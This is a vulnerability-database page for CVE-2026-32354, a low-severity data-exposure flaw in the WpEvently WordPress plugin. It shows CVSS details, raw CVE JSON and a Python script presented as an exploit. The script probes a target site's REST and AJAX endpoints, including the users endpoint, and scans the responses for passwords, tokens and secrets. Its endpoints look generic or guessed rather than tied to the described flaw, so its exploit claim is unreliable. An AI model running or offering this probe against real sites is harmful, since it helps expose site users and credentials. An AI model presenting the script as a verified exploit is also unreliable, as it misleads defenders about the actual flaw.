Security Vulnerability Report
中文
CVE-2026-32354 CVSS 5.3 MEDIUM

CVE-2026-32354

Published: 2026-03-13 19:54:48
Last Modified: 2026-04-22 21:30:26

Description

Insertion of Sensitive Information Into Sent Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Retrieve Embedded Sensitive Data.This issue affects WpEvently: from n/a through < 5.1.9.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WpEvently < 5.1.9
mage-eventpress 所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32354 PoC - WordPress WpEvently Sensitive Data Exposure import requests import sys def exploit_cve_2026_32354(target_url): """ Exploit for CVE-2026-32354: WordPress WpEvently Sensitive Information Disclosure This PoC demonstrates the sensitive data exposure vulnerability in WpEvently plugin. The vulnerability allows unauthorized retrieval of embedded sensitive data. """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2026-32354...") # Common WordPress plugin endpoints endpoints = [ "/wp-json/wp/v2/users", "/wp-json/mage-eventpress/v1/events", "/wp-content/plugins/mage-eventpress/includes/api.php", "/wp-admin/admin-ajax.php?action=wpevently_get_data" ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'application/json' } response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Found accessible endpoint: {url}") print(f"[+] Response length: {len(response.text)} bytes") # Check for sensitive data patterns sensitive_patterns = ['api_key', 'password', 'token', 'secret', 'credential'] for pattern in sensitive_patterns: if pattern.lower() in response.text.lower(): print(f"[!] WARNING: Potential sensitive data found containing '{pattern}'") print(f"\n[+] Response preview:\n{response.text[:500]}...") return True except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") print("[*] No vulnerable endpoints found or target is patched") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] else: target = "http://target-wordpress-site.com" exploit_cve_2026_32354(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32354", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:47.590", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Retrieve Embedded Sensitive Data.This issue affects WpEvently: from n/a through < 5.1.9."}, {"lang": "es", "value": "Vulnerabilidad de Inserción de Información Sensible en Datos Enviados en magepeopleteam WpEvently mage-eventpress permite Recuperar Datos Sensibles Incrustados. Este problema afecta a WpEvently: desde n/a hasta &lt; 5.1.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-1-9-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}